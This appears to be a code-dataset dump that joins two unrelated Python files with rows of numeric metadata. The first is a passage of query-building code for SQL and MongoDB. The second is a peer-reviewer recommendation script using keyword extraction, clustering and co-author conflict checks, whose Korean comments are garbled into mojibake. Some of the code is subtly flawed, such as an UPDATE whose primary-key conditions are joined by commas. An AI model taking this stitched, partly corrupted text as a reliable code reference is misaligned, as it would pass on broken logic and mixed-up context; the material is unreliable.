"""Query config that translates parameters into SQL statements."""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a retrieval query"""
filtered_data = self.filter_values(input_data)
if filtered_data:
clauses = []
query_data: Dict[str, Tuple[Any, ...]] = {}
field_list = ",".join(self.fields)
for field_name, data in filtered_data.items():
if len(data) == 1:
clauses.append(f"{field_name} = :{field_name}")
query_data[field_name] = (data[0],)
elif len(data) > 1:
clauses.append(f"{field_name} IN :{field_name}")
query_data[field_name] = tuple(set(data))
else:
# if there's no data, create no clause
pass
if len(clauses) > 0:
query_str = f"SELECT {field_list} FROM {self.node.node.collection.name} WHERE {' OR '.join(clauses)}"
return text(query_str).params(query_data)
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a SQL update statement in the form of a TextClause"""
update_fields = self.update_fields(policy)
update_value_map = {k: None for k in update_fields}
update_clauses = [f"{k} = :{k}" for k in update_fields]
pk_clauses = [f"{k} = :{k}" for k in self.primary_keys]
for pk in self.primary_keys:
update_value_map[pk] = row[pk]
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update statement for {self.node.address}"
)
return None
query_str = f"UPDATE {self.node.address.collection} SET {','.join(update_clauses)} WHERE {','.join(pk_clauses)}"
logger.info("query = %s, params = %s", query_str, update_value_map)
return text(query_str).params(update_value_map)
def query_to_str(self, t: TextClause, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
def transform_param(p: Any) -> str:
if isinstance(p, str):
return f"'{p}'"
return str(p)
query_str = str(t)
for k, v in input_data.items():
if len(v) == 1:
query_str = re.sub(f"= :{k}", f"= {transform_param(v[0])}", query_str)
elif len(v) > 0:
query_str = re.sub(f"IN :{k}", f"IN { tuple(set(v)) }", query_str)
return query_str
def dry_run_query(self) -> Optional[str]:
query_data = self.display_query_data()
text_clause = self.generate_query(query_data, None)
if text_clause is not None:
return self.query_to_str(text_clause, query_data)
return None
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1},{k2:v2}...}, {$set: {f1:fv1, f2:fv2 ... }}, upsert=False).
This is returned as a tuple
({k1:v1},{k2:v2}...}, {f1:fv1, f2: fv2 ... }
"""
class MongoQueryConfig(QueryConfig[MongoStatement]):
"""Query config that translates paramters into mongo statements"""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
def transform_query_pairs(pairs: Dict[str, Any]) -> Dict[str, Any]:
"""Since we want to do an 'OR' match in mongo, transform queries of the form
{A:1, B:2} => "{$or:[{A:1},{B:2}]}".
Don't bother to do this if the pairs size is 1
"""
if len(pairs) < 2:
return pairs
return {"$or": [dict([(k, v)]) for k, v in pairs.items()]}
if input_data:
filtered_data = self.filter_values(input_data)
if filtered_data:
field_list = {field_name: 1 for field_name in self.fields}
query_pairs = {}
for field_name, data in filtered_data.items():
if len(data) == 1:
query_pairs[field_name] = data[0]
elif len(data) > 1:
query_pairs[field_name] = {"$in": data}
else:
# if there's no data, create no clause
pass
query_fields, return_fields = (
transform_query_pairs(query_pairs),
field_list,
)
return query_fields, return_fields
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
"""Generate a SQL update statement in the form of Mongo update statement components"""
update_fields = self.update_fields(policy)
update_clauses = {k: None for k in update_fields}
pk_clauses = {k: row[k] for k in self.primary_keys}
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update for {self.node.address}"
)
return None
return pk_clauses, {"$set": update_clauses}
def query_to_str(self, t: MongoStatement, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
query_data, field_list = t
db_name = self.node.address.dataset
collection_name = self.node.address.collection
return f"db.{db_name}.{collection_name}.find({query_data}, {field_list})"
def dry_run_query(self) -> Optional[str]:
data = self.display_query_data()
mongo_query = self.generate_query(self.display_query_data(), None)
if mongo_query is not None:
return self.query_to_str(mongo_query, data)
return None
| 38.655738
| 128
| 0.598473
| 1,532
| 11,790
| 4.475849
| 0.156658
| 0.016334
| 0.014438
| 0.0175
| 0.382529
| 0.356716
| 0.319236
| 0.257255
| 0.227651
| 0.216567
| 0
| 0.007356
| 0.296692
| 11,790
| 304
| 129
| 38.782895
| 0.819585
| 0.16972
| 0
| 0.313131
| 0
| 0.010101
| 0.081027
| 0.020146
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126263
| false
| 0.010101
| 0.050505
| 0.010101
| 0.348485
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c97c75c9954f8ab840e506c7e164088d7c58e96
| 17,208
|
py
|
Python
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | 2
|
2020-05-25T08:20:54.000Z
|
2020-05-25T08:21:02.000Z
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
#์ ์ฒ๋ฆฌ ํจ์ ์ ์๋ถ
def remove_string_special_characters(s):
stripped = re.sub('[^a-zA-z\s]', '', s)
stripped = re.sub('_', '', stripped)
stripped = re.sub('\s+', ' ', stripped)
stripped = stripped.strip()
if stripped != '':
return stripped.lower()
#ํด๋์ค ์ ๋ ฌ ํจ์ ์ ์๋ถ
def multisort(xs, specs):
for key, reverse in reversed(specs):
xs.sort(key=attrgetter(key), reverse=reverse)
return xs
#์์ฑ์งํฉ ์ถ์ถ ํจ์ ์ ์๋ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅcsv path, ์์ ์งํฉ ํฌํจ ์ถ๋ ฅcsv path, ์ถ์ถํ ๋จ์ด ์)
def extractive_keyword(path,database_update_path,extract_word_num=20):
reviewee = pd.read_csv(path, encoding='latin1')
count,temp = len(reviewee),[]
for i in range(count):
temp_intro = reviewee['submitter_intro'][i]
temp_sent = summarize(reviewee['submitter_intro'][i], ratio=0.05)
textrank_textsent_mearge = ''
textrank_text,textrank_sent = '',''
for c in (keywords(temp_intro, words=extract_word_num-(extract_word_num//4), lemmatize=True).split('\n')):
textrank_text += (c+ " ")
for cc in (keywords(temp_sent, words=(extract_word_num//4), lemmatize=True).split('\n')):
textrank_sent += (cc+ " ")
temp.append(textrank_text + " " + textrank_sent)
reviewee['submitter_attribute']=temp
reviewee.iloc[:,1:].to_csv(database_update_path)
#return type : pandas.dataframe
return reviewee
#์ ๋ฌธ์ฑ ๊ฒ์ฌ ํจ์ ์ ์๋ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅcsv path, ํฌ๊ณ ์๊ณ DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์, ์ค๋ฃจ์ฃ๊ฐ ๊ณ์ฐ ๋ฒ์ ์ง์ )
def professionalism(path,extractive_keyword_result,reviewee_index,top_limit,silhouette_range=25):
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
temp_id,temp_doi = 0,''
temp_title = reviewee.loc[index]['submitter_title']
temp_attribure = reviewee.loc[index]['submitter_attribute']
reviewer_attr = pd.read_csv(path, encoding='latin1')
reviewer_attr.loc[-1]=[str(temp_id),temp_doi,temp_title,temp_attribure]
reviewer_attr.index += 1
reviewer_attr.sort_index(inplace=True)
reviewer=reviewer_attr['reviewer_paper_attribure']
jac_token,jac,cos,avg=[],[],[],[]
for t in range(len(reviewer)):
jac_token.append(set(nltk.ngrams((nltk.word_tokenize(reviewer[t])), n=1)))
for j in range(len(reviewer)):
jac.append(1-(nltk.jaccard_distance(jac_token[0], jac_token[j])))
count_vectorizer = CountVectorizer(stop_words='english')
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(reviewer)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=[i for i in reviewer])
cos=cosine_similarity(df, df)[0].tolist()
for i in range(len(jac)):
avg.append((jac[i] + cos[i])/2)
reviewer_attr['sim']=avg
vectorizer = TfidfVectorizer(stop_words='english')
Y = vectorizer.fit_transform(reviewer)
YY = Y.toarray()
X = StandardScaler().fit_transform(YY)
top_avg,top_k=0,0
silhouette,k_mean,k_mean2=[],[],[]
for i in range(2,silhouette_range+1,1):
model = SpectralClustering(n_clusters=i, affinity="nearest_neighbors")
cluster_labels = model.fit_predict(X)
sample_silhouette_values = silhouette_samples(YY, cluster_labels)
silhouette_avg = sample_silhouette_values.mean()
if top_avg < silhouette_avg:
top_avg = silhouette_avg
top_k = i
silhouette_temp=[]
silhouette_temp.append('k=' + str(i) + '์ผ๋ : ')
silhouette_temp.append(silhouette_avg)
silhouette.append(silhouette_temp)
model = KMeans(n_clusters=(top_k), init='k-means++', max_iter=100, n_init=1)
model.fit(Y)
for k in range(len(reviewer)):
YYY = vectorizer.transform([reviewer[k]])
prediction = model.predict(YYY)
k_mean.append(prediction)
for k in range(len(reviewer)):
k_mean2.append(int(k_mean[k][0]))
reviewer_attr['k_mean']=k_mean2
kmean_reviewer = reviewer_attr[reviewer_attr['k_mean'] == reviewer_attr.loc[0]['k_mean']]
kmean_reviewer2 = kmean_reviewer.sort_values(by=['sim'], axis=0, ascending=False)
professionalism=kmean_reviewer2.iloc[1:top+1]
#return type : pandas.dataframe
return professionalism
#์ดํด๊ด๊ณ ๊ฒ์ฌ ํจ์ ์ ์๋ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(์ฌ์ฌํ๋ณด์_๊ณต์ ์csv path, ์ฌ์ฌํ๋ณด์_์ ๋ณดcsv path, ์ฌ์ฌํ๋ณด์_๊ณต์ ์๋คํธ์ํฌcsv path,์ ๋ฌธ์ฑ๊ฒ์ฌ๊ฒฐ๊ณผ_DataFrame, ํฌ๊ณ ์๊ณ _DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์, ์ฌ์ฌํ๋ณด์_๊ณต์ ์๋คํธ์ํฌ_๊ณฑ์
ํ์)
def interest(co_author_path, reviewer_information_path, co_author_network_path, professionalism_result, extractive_keyword_result, reviewee_index,top_limit,matrix_multifly_count):
crash_result,reviewee_list=[],[]
reviewer_list1,reviewer_co_list=[],[]
path1=co_author_path
path2=reviewer_information_path
network_path=co_author_network_path
temp = professionalism_result
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
multifly=matrix_multifly_count
co_author_csv = pd.read_csv(path1, encoding='latin1')
co_author_df = co_author_csv.merge(temp, on=['reviewer_orcid'])
tt = co_author_df.iloc[:]['reviewer_name'].tolist()
reviewee_list=[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+5
if reviewee.loc[index][col_index] != 0:
reviewee_list.append(reviewee.loc[index][col_index])
reviewer_list,reviewer_co_list=[],[]
for j in range(len(co_author_csv)):
co_list_temp=[]
reviewer_list.append(co_author_csv['reviewer_name'][j])
co_list_temp.append(co_author_csv['reviewer_name'][j])
for i in range(1,11):
col_index = (i*2)
if co_author_csv.loc[j][col_index] != 0:
co_list_temp.append(co_author_csv.loc[j][col_index])
reviewer_co_list.append(co_list_temp)
co_rel_df = pd.DataFrame(
columns=[i for i in reviewer_list],
index=[j for j in reviewee_list])
for j in range(len(reviewee_list)):
for i in range(len(reviewer_list)):
for k in range(len(reviewer_co_list[i])):
if reviewee_list[j] == reviewer_co_list[i][k]:
co_rel_df.iat[j, i] = 1
co_rel_df.fillna(0, inplace=True)
try :
matrix_df = pd.read_csv(co_author_network_path, encoding='latin1', index_col=0)
except FileNotFoundError :
index = co_author_csv['reviewer_orcid'].index[co_author_csv['reviewer_orcid'].apply(np.isnan)]
df_index = co_author_csv.index.values.tolist()
nan_range =[df_index.index(i) for i in index]
try :
import_csv2=co_author_csv.iloc[:nan_range[0]]
id_list=import_csv2['reviewer_name'].tolist()
except IndexError :
import_csv2=co_author_csv
id_list = co_author_csv.iloc[:]['reviewer_name'].tolist()
matrix_df = pd.DataFrame(
columns=[i for i in id_list],
index=[j for j in id_list])
for i in range(len(id_list)):
for j in range(len(id_list)):
index=[1,]
index.extend([(j*2) for j in range(1,11)])
for k in range(11):
if (id_list[i]) == (import_csv2.iloc[j][index[k]]) :
print(id_list[i], import_csv2.iloc[j][index[k]])
print(i)
matrix_df.iat[j, i] = 1
matrix_df.iat[i, j] = 1
if str(id_list[i]) == str(id_list[j]):
matrix_df.iat[i, j] = 0
matrix_df.fillna(0, inplace=True)
matrix_df.to_csv(co_author_network_path)
for i in range(multifly):
matrix_df = matrix_df.dot(matrix_df)
a=matrix_df.values
b=co_rel_df.values
aaa = b.dot(a)
aaa2=pd.DataFrame(data=aaa,
index=(co_rel_df.index).tolist(),
columns=(matrix_df.index).tolist())
a_series = (aaa2 != 0).any(axis=1)
new_df = aaa2.loc[a_series]
ccc=(new_df.index).tolist()
ddd=co_author_df['reviewer_name'].tolist()
reviewer_list1 = list(set(ddd).difference(ccc))
co_inst_csv = pd.read_csv(path2, encoding='latin1')
co_inst_df = co_inst_csv.merge(temp, on=['reviewer_orcid'])
reviewee_list2,reviewer_list2,reviewer_inst_list=[],[],[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+6
if reviewee.loc[index][col_index] != 0:
reviewee_list2.append(reviewee.loc[index][col_index])
for j in range(len(co_inst_df)):
inst_list_temp=[]
reviewer_list2.append(co_inst_df['reviewer_name'][j])
reviewer_inst_list.append(co_inst_df['reviewer_institution'][j])
inst_rel_df = pd.DataFrame(
columns=[i for i in reviewee_list2],
index=[j for j in reviewer_list2])
for i in range(len(reviewee_list2)):
for j in range(len(reviewer_list2)):
if reviewee_list2[i] == reviewer_inst_list[j]:
inst_rel_df.iat[j, i] = 1
for i in range(len(reviewer_list2)):
if (inst_rel_df.sum(axis=1)[i]) > 0:
reviewer_list2.remove(inst_rel_df.index[i])
crash_result.append(inst_rel_df.index[i])
reviewer_list1,reviewer_list2 = reviewer_list1[0:top*2],reviewer_list2[0:top*2]
reviewer_rank = list(set(reviewer_list1).intersection(reviewer_list2))
id_index,sim_index,count_index=[],[],[]
reviewer_rank = pd.DataFrame({'reviewer_name': reviewer_rank})
for i in range(len(reviewer_rank)):
for j in range(len(co_author_df)):
if reviewer_rank.loc[i]['reviewer_name'] == co_author_df.loc[j]['reviewer_name'] :
id_index.append(int(co_author_df.iloc[j]['reviewer_orcid']))
sim_index.append(co_author_df.iloc[j]['sim'])
if reviewer_rank.loc[i]['reviewer_name'] == co_inst_df.loc[j]['reviewer_name'] :
count_index.append(co_inst_df.iloc[j]['count'])
reviewer_rank['reviewer_orcid']=id_index
reviewer_rank['sim']=sim_index
reviewer_rank['count']=count_index
#return type : pandas.dataframe
return reviewer_rank
#csv ์ ์ฅ ํจ์ ์ ์๋ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(save_path, ํฌ๊ณ ์๊ณ _DataFrame, ์ ๋ฌธ์ฑ๊ฒ์ฌ_DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์)
def save_csv(output_path,extractive_keyword_result,professionalism_result,reviewee_index,top_limit):
path=output_path
reviewee=extractive_keyword_result
reviewer_rank_name=professionalism_result
ee_num=reviewee_index
top=top_limit
export_data=[]
for i in range((top*2)):
temp=[]
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_title'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['date'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_orcid'])
temp.append(reviewer_rank_name.iloc[i]['sim'])
temp.append(reviewer_rank_name.iloc[i]['count'])
export_data.append(temp)
try :
export_csv = pd.read_csv(path,index_col=0)
except FileNotFoundError :
export_csv = pd.DataFrame([],columns=[
'submitter_title','date','submitter_name','reviewer_name','reviewer_orcid','sim','count'])
for i in range(len(export_data)):
export_csv.loc[len(export_csv)] = export_data[i]
export_csv.to_csv(path)
#๊ท ๋ฑํ ๋น ํจ์ ์ ์๋ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅ path)
def equl_distribution(input_csv_path, output_csv_path):
final_list=[]
export_csv2 = pd.read_csv(input_csv_path,index_col=0)
class Paper:
def __init__(self, title, date, submitter, reviwer_name, reviwer_orcid, sim, count):
self.title = title
self.date = date
self.submitter = submitter
self.reviwer_name = reviwer_name
self.reviwer_orcid = reviwer_orcid
self.sim = sim
self.count = count
def __repr__(self):
return repr((self.title, self.date, self.submitter, self.reviwer_name, self.reviwer_orcid, self.sim, self.count))
papers,objs=[export_csv2.iloc[i].tolist() for i in range(len(export_csv2))],[]
for paper in papers:
objs.append(Paper(*paper))
o = (multisort(list(objs), (('date', False), ('sim', True))))
for i in range(0,len(export_csv2),6) :
temp_list=[]
for t in range(6):
if len(temp_list) == 3:
break
else :
temp = i + t
if (o[temp].count) < 3 :
o[temp].count += 1
for j in range(0+temp, len(export_csv2)) :
if (o[temp].reviwer_name == o[j].reviwer_name) :
o[j].count += 1
o[temp].count -= 1
temp_list.append(o[temp])
final_list.extend(temp_list)
final=pd.DataFrame(final_list,columns=['result'])
final.to_csv(output_csv_path)
#๋ํดํธ ์คํ ํจ์ ์ ์๋ถ
def main():
#ํฌ๊ณ ์๊ณ ์ ๋ํ ์์ฑ์งํฉ ์ถ์ถ
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅcsv path, ์์ ์งํฉ ํฌํจ ์ถ๋ ฅcsv path, ์ถ์ถํ ๋จ์ด ์)
reviewee=extractive_keyword(path='../reviewee/submitter_10.csv',
database_update_path='../reviewee/reviwupdate.csv',
extract_word_num=20)
#return type : pandas.dataframe
#ํฌ๊ณ ์๊ณ ์ ๋งํผ์ ๊ฒ์ฌ์ธํธ ์งํ
for i in range(len(reviewee)):
#์ ๋ฌธ์ฑ๊ฒ์ฌ
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅcsv path, ํฌ๊ณ ์๊ณ DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์, ์ค๋ฃจ์ฃ๊ฐ ๊ณ์ฐ ๋ฒ์ ์ง์ )
reviewer=professionalism(path='../reviewer_pool/reviewer_attribute_5.csv',
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=10,
silhouette_range=25)
#return type : pandas.dataframe
#์ดํด๊ด๊ณ๊ฒ์ฌ
#ํค์๋ ๋งค๊ฐ๋ณ์(์ฌ์ฌํ๋ณด์_๊ณต์ ์csv path, ์ฌ์ฌํ๋ณด์_์ ๋ณดcsv path, ์ฌ์ฌํ๋ณด์_๊ณต์ ์๋คํธ์ํฌcsv path,
#์ ๋ฌธ์ฑ๊ฒ์ฌ๊ฒฐ๊ณผ_DataFrame, ํฌ๊ณ ์๊ณ _DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์, ์ฌ์ฌํ๋ณด์_๊ณต์ ์๋คํธ์ํฌ_๊ณฑ์
ํ์)
reviewer_rank = interest(
co_author_path='../reviewer_pool/reviewer_coauthor_5.csv',
reviewer_information_path='../reviewer_pool/reviewer_information_5.csv',
co_author_network_path='../reviewer_pool/co_author_network_0525.csv',
professionalism_result=reviewer,
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=6,
matrix_multifly_count=1)
#return type : pandas.dataframe
#csv์ ์ฅ
#ํค์๋ ๋งค๊ฐ๋ณ์(save_path, ํฌ๊ณ ์๊ณ _DataFrame, ์ ๋ฌธ์ฑ๊ฒ์ฌ_DataFrame, i๋ฒ์งธ ํฌ๊ณ ์๊ณ , ์ถ์ฒํ ์ฌ์ฌ์ ์)
save_csv(output_path='../system_output/export_csv_0525_10.csv',
extractive_keyword_result=reviewee,
professionalism_result=reviewer_rank,
reviewee_index=i,
top_limit=3)
#๊ท ๋ฑํ ๋น
#ํค์๋ ๋งค๊ฐ๋ณ์(์
๋ ฅ path)
equl_distribution(input_csv_path='../system_output/export_csv_0525_10.csv',
output_csv_path='../system_output/final_csv_0525_10.csv')
if __name__ == '__main__':
#๋ํดํธ ์คํ ํจ์
main()
| 29.01855
| 179
| 0.609949
| 2,208
| 17,208
| 4.491848
| 0.148551
| 0.022585
| 0.013309
| 0.018855
| 0.36217
| 0.260738
| 0.185723
| 0.152853
| 0.129764
| 0.090341
| 0
| 0.014202
| 0.279812
| 17,208
| 593
| 180
| 29.01855
| 0.786089
| 0.06404
| 0
| 0.086687
| 0
| 0
| 0.062341
| 0.022522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03096
| false
| 0
| 0.105263
| 0.003096
| 0.157895
| 0.006192
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|